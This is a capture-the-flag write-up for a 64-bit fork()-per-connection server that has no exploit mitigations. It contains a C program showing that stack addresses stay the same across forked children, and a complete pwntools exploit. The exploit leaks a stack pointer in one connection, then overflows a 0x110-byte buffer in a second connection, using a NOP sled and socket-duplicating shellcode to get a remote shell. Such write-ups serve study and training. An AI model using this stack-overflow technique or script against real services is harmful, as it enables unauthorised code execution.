Recently I have wanted to work through more challenges to build up experience.
--------
Program analysis
64-bit binary, with none of the mitigations enabled (only Partial RELRO, which is the linker default):
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
The exploitation path has one small twist, so here are the key points briefly:
1 A child process created by fork() inherits the parent's address space unchanged, so the stack addresses in every child are the same (ASLR is applied once, at exec, not per fork). In this challenge a stack address leaked in one connection can therefore be reused in the next one.
2 The function calls memcpy and then strcpy back-to-back; analyze the details of that sequence carefully.
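Point 1 is the whole reason the exploit below can be split into a "leak" connection and an "exploit" connection. The following C program is an added demonstration of that property; it is not the challenge binary and not the author's code. It mimics a fork()-per-connection server: each child reports the address of a stack buffer and of a second stack slot (standing in for the pointer the real service leaks), the parent collects them over a pipe, and two checks are performed: first, that two successive children see identical stack addresses; second, that an offset measured once (as one would measure it under gdb) plus a pointer leaked from a later child predicts that child's buffer address exactly, which is the `buf_addr = leak_stack + (buf_0x10 - leak)` arithmetic of the exploit script. The buffer size 0x110 is taken from the script; everything else is a constructed example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs in the forked child, like a per-connection handler.
 * Reports the address of a stack buffer and of another stack slot,
 * then exits without returning (as a real handler child would). */
static void handle_client(int out_fd) {
    char buf[0x110];                      /* stands in for the vulnerable buffer */
    uintptr_t addrs[2];
    memset(buf, 0, sizeof buf);
    addrs[0] = (uintptr_t)buf;            /* what we want to jump to */
    addrs[1] = (uintptr_t)&addrs;         /* what the service "leaks" */
    if (write(out_fd, addrs, sizeof addrs) != (ssize_t)sizeof addrs)
        _exit(1);
    _exit(0);
}

/* Spawns one "connection" (one fork) and reads back the two addresses.
 * Returns 0 on success, -1 on any failure. */
static int spawn_child(uintptr_t addrs[2]) {
    int fds[2];
    if (pipe(fds) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        close(fds[0]);
        handle_client(fds[1]);            /* never returns */
    }
    close(fds[1]);
    ssize_t n = read(fds[0], addrs, sizeof(uintptr_t) * 2);  /* 16 bytes, single write, atomic */
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return n == (ssize_t)(sizeof(uintptr_t) * 2) ? 0 : -1;
}

/* 1 if two successive children see exactly the same stack addresses,
 * 0 if they differ, -1 on error.  Identical call chain in both cases,
 * so the only thing that could differ is per-fork randomisation, and
 * there is none. */
int stack_stable_across_forks(void) {
    uintptr_t a[2], b[2];
    if (spawn_child(a) || spawn_child(b))
        return -1;
    return a[0] == b[0] && a[1] == b[1];
}

/* Mirrors the exploit arithmetic: measure (buf - leaked_slot) once in a
 * first child (what the gdb session gives you), then apply that delta to a
 * pointer leaked from a different child.  1 if the prediction is exact. */
int predicted_buf_matches(void) {
    uintptr_t measured[2], live[2];
    if (spawn_child(measured) || spawn_child(live))
        return -1;
    intptr_t delta = (intptr_t)measured[0] - (intptr_t)measured[1];
    uintptr_t predicted = (uintptr_t)((intptr_t)live[1] + delta);
    return predicted == live[0];
}

int main(void) {
    printf("stack stable across forks: %d\n", stack_stable_across_forks());
    printf("leak + measured delta hits buffer: %d\n", predicted_buf_matches());
    return 0;
}
```

The same reasoning is why the script can simply close the first connection after the leak and open a fresh one: the new child is a copy of the same parent, so the leaked address and the measured delta are still valid. It would stop holding if the server re-executed itself per connection (execve re-randomises) or ran each connection in a thread with a fresh mmap'd stack.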
--------
from pwn import *

context(os='linux', arch='amd64')
#context.log_level = 'debug'

# Connection 1: walk through the login dialogue, then trigger the leak.
p = remote('127.0.0.1', 6666)
p.sendlineafter(b'\x00', b'arsenal')
p.sendlineafter(b'\x00', b'gyeongbokgung')
p.sendlineafter(b'\x00', b'psy')
p.recvuntil(b'\x00')
log.info('communicate complete')
p.sendline(b'a' + b'\x00' * 7)
# The echoed data ends in a stack pointer; take its 6 significant bytes and zero-extend.
leak_stack = u64(p.recvuntil(b'\xff\x7f')[-6:] + b'\x00\x00')
p.recvrepeat(2)
p.close()
log.info('get some info ' + hex(leak_stack))

# Connection 2: a fresh fork()ed child with the same stack layout, so the leak is still valid.
r = remote('127.0.0.1', 6666)
r.sendlineafter(b'\x00', b'arsenal')
r.sendlineafter(b'\x00', b'gyeongbokgung')
r.sendlineafter(b'\x00', b'psy')
r.recvuntil(b'\x00')
log.info('communicate complete')

# Offsets measured once under gdb: buffer start (+0x10) and the leaked pointer.
buf_0x10 = 0x7fff10e2dcd0
leak = 0x7fff10e2dd50
buf_addr = leak_stack + (buf_0x10 - leak)
#raw_input()

# NOP sled, then shellcode that dups the client socket (fd 4) onto stdio and spawns a shell;
# the saved return address sits at 0x110-8 from the start of the buffer (NX is off).
offset = 0x10
pad = asm(shellcraft.nop())
buf = pad * offset + asm(shellcraft.dupsh(4))
buf += pad * (0x110 - 8 - len(buf)) + p64(buf_addr)
r.sendline(buf)
r.interactive()